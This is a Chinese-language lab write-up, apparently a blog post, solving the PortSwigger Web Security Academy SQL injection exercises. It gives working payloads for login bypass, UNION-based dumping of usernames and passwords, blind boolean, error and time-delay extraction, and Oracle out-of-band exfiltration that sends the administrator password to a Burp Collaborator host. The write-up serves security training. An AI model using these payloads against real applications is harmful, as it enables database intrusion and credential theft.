Portswigger web security academy:SQL injection
-
Portswigger web security academy:SQL injection
- SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- SQL injection vulnerability allowing login bypass
- SQL injection UNION attack, determining the number of columns returned by the query
- SQL injection UNION attack, finding a column containing text
- SQL injection UNION attack, retrieving data from other tables
- SQL injection UNION attack, retrieving multiple values in a single column
- SQL injection attack, querying the database type and version on Oracle
- SQL injection attack, querying the database type and version on MySQL and Microsoft
- SQL injection attack, listing the database contents on non-Oracle databases
- SQL injection attack, listing the database contents on Oracle
- Blind SQL injection with conditional responses
- Blind SQL injection with conditional errors
- Blind SQL injection with time delays
- Blind SQL injection with time delays and information retrieval
- Blind SQL injection with out-of-band interaction
- Blind SQL injection with out-of-band data exfiltration
SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
-
题目描述
在产品类别处可以sql注入,sql语句:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
要求显示所有产品的信息
-
解题过程
/filter?category=' or 1=1 --
SQL injection vulnerability allowing login bypass
-
题目描述
登录的sql语句:
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
要求登录
administrator
账号 -
解题过程
account:
administrator' --
password:
asd
SQL injection UNION attack, determining the number of columns returned by the query
-
题目描述
产品类别过滤器可以sql注入
要求使用union返回一个额外的空行
(爆字段数)
-
解题过程
/filter?category=' union select null,null,null --
SQL injection UNION attack, finding a column containing text
-
题目描述
产品类别过滤器可以sql注入
要求使用union返回额外的一行数据
(爆回显位)
-
解题过程
-
爆字段数
/filter?category=' order by 3 --
测出来是3 -
爆回显位
/filter?category=' union select null,'asd',null --
测出来是第二位 把
asd
换成页面标题里给的字符串,然后访问
-
SQL injection UNION attack, retrieving data from other tables
-
题目描述
产品类别过滤器可以sql注入
数据库里有
users
表,包含字段username
和password
要求拿到
administrator
的账号去登录 -
解题过程
-
爆字段数
/filter?category=' union select null,null --
-
爆回显位
/filter?category=' union select '1','2' --
-
爆数据
/filter?category=' union select concat(username),concat(password) from users --
用
administrator
d的号去登录
-
SQL injection UNION attack, retrieving multiple values in a single column
-
题目描述
产品类别过滤器可以sql注入
数据库里有
users
表,包含字段username
和password
要求拿到
administrator
的账号去登录 -
解题过程
-
爆字段数
/filter?category=' union select null,null --
-
爆回显位
/filter?category=' union select null,'asd' --
-
爆数据
/filter?category=' union select null,password from users --
一共也就仨密码,都试一遍
-
SQL injection attack, querying the database type and version on Oracle
-
题目描述
产品类别过滤器可以sql注入
要求爆出数据库版本
-
解题过程
题目说了是
Oracle
数据库,所以自定义数据的后边要加上表from dual
-
还是先爆字段数和回显位
/filter?category=' union select null,'asd' from dual --
-
爆数据
/filter?category=' union select null,banner from v$version --
-
SQL injection attack, querying the database type and version on MySQL and Microsoft
-
题目描述
和上一题一样,把
Oracle
换成了MySQL
和Microsoft
要求爆出数据库版本
-
解题过程
-
爆字段数和回显位
/filter?category=' union select 'asd','asd' --
-
爆数据
/filter?category=' union select @@version,'asd' --
-
SQL injection attack, listing the database contents on non-Oracle databases
-
题目描述
产品类别过滤器可以sql注入
要求使用
administrator
的账号登录 -
解题过程
-
爆字段数和回显位
/filter?category=' union select 'asd','asd' --
-
爆数据库名
/filter?category=' union select null,concat(shema_name) from information_schema.schemata --
-
爆表名
/filter?category=' union select null,concat(table_name) from information_schema.tables where table_schema='public'--
-
爆字段名
/filter?category=' union select null,concat(column_name) from information_schema.columns where table_name ='user_xxxx' --
-
爆数据
/filter?category=' union select usename_xxxx,password_xxxx from user_xxx --
-
SQL injection attack, listing the database contents on Oracle
-
题目描述
和上道题一样,只是数据库换成了
Oracle
要求使用
administrator
登录 -
解题过程
-
爆字段数和回显位
/filter?category=' union select 'asd','asd' --
-
爆表名
/filter?category=' union select null,table_name from all_tables --
-
爆字段名
/filter?category=' union select null,column_name from all_tab_columns where table_name ='user_xxx'--
-
爆数据
/filter?category=' union select USERNAME_xxx,PASSWORD_xxx from USERS_xxx --
-
Blind SQL injection with conditional responses
-
题目描述
这道题可以sql盲注,应用使用了追踪cookie来分析访问数据,并且使用cookie进行了sql查询
数据库有张
users
表,里面有username
和password
字段要求使用
administrator
登录 -
解题过程
测试发现正常情况下页面会有
welcome back
,错误时没有-
爆密码长度
TrackingId=0NgJWbCq47MjBGsQ' and (select length(password) from users where username='administrator')=§1§ --
丢给intruder跑,最后筛选出含有
Welcome back
的请求,最终密码长度跑出来是20 -
爆密码
TrackingId=0NgJWbCq47MjBGsQ' and substr((select password from users where username='administrator'),§1§,1)='§a§'
还是筛选出有
welcome back
的请求,然后按下一题的处理方法处理就行(我先写的下一题)
-
Blind SQL injection with conditional errors
-
题目描述
上道题的升级版
数据库有张
users
表,里面有username
和password
字段要求使用
administrator
登录 -
解题过程
用burp抓包,repeater改cookie,测出字段数是1
-
' unoin select 'asd' --
会报错,猜测可能是oracle'union select 'asd' from dual --
页面正常,验证猜测 不知道为什么
if(x,x,x)
表达式用不了,只能用select case when (s1) then s2 else s3 end from dual --
-
爆密码长度
' union select case when((select length(password) from users where username='administrator')=1) then to_char(1/0) else null end from dual --
测出来密码长度为20
-
爆密码
用intruder的
cluster bomb
模式,数字设为1-20,字母用brute forcer
union select case when (substr((select password from users where username='administraror'),$1$,1)='$a$') then to_char(1/0) else null end from dual --
最后把状态码为500的按顺序提取出来就行
-
提取密码
把状态码为500的全部选中复制
粘贴到excel中,按1-20进行升序排序,赋值payload
把payload复制,粘贴到txt中,然后手动去掉换行
-
或者,cmd -> python
s='''粘贴'''
s.replace('\n','')
当然手写python脚本是最方便的
Blind SQL injection with time delays
-
题目描述
延时注入,注入点还是在cookie
要求延时10秒
-
解题过程
尝试了几种数据库的延时注入的payload都没有用,丢给sqlmap跑了一下也跑不出来
有点奇怪,看了solution,给的payload是
|| pg_sleep(10) --
,= = 我试过|| pg_sleep(10)
,但是没得用这里是堆叠注入,但是为啥能堆叠不能union呢
想不通为啥,有师傅知道的话希望能点拨一下
Blind SQL injection with time delays and information retrieval
-
题目描述
上一题的升级版
数据库有张
users
表,里面有username
和password
字段要求使用
administrator
登录 -
解题过程
-
爆password长度
'%3b select case when((select length(password) from users where username='administrator')=1) then pg_sleep(10) else null end --
(因为代理有几百毫秒的延迟,所以我设置的是10s,可以根据网络状况缩短) -
爆password
%3b select case when(substr((select password from users where username='administrator'),1,1)='a') then pg_sleep(10) else null end --
爆破方法和前面的题一样,根据
Response received
筛选
-
Blind SQL injection with out-of-band interaction
-
题目描述
out-of-band
是信息外带漏洞,核心思想是通过低权限的传输方式来窃取数据。贴一篇介绍:(中文版) https://www.freebuf.com/articles/database/183997.html
(英文版)https://www.notsosecure.com/oob-exploitation-cheatsheet/
要求通过sql注入,完成一次DNS查询
-
解题过程
用Burp生成一个
Burp Callaborator
的链接,构造payload:'%3b copy (SELECT 'asd') to program 'nslookup 6ip1x1l2cn0xzunhypukgbj61x7nvc.burpcollaborator.net' --
没起作用,怕是又换了数据库。。。而且没有交互的sql查询也查不出数据库信息,只能挨着试一下
试出来是Oracle
' union SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://txuoco0prafkeh24dc97vyytgkmca1.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual --
需要urlencode一下
'%20union%20SELECT%20extractvalue%28xmltype%28%27%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%20%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//txuoco0prafkeh24dc97vyytgkmca1.burpcollaborator.net/%22%3E%20%25remote%3B%5D%3E%27%29%2C%27/l%27%29%20FROM%20dual%20--
Blind SQL injection with out-of-band data exfiltration
-
题目描述
上一题的升级版,要求用OOB拿到
administrator
的 密码并登录 -
解题过程
看不出数据库类型,猜测跟上一题一样(猜对了
' union SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(select password from users where username='administrator')||'.chxskkwstibqfras48jloj2au10rog.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual --+
还是要url编码一下
' union SELECT%20extractvalue%28xmltype%28%27%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%20%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//%27%7C%7C%28select%20password%20from%20users%20where%20username%3D%27administrator%27%29%7C%7C%27.chxskkwstibqfras48jloj2au10rog.burpcollaborator.net/%22%3E%20%25remote%3B%5D%3E%27%29%2C%27/l%27%29%20FROM%20dual --+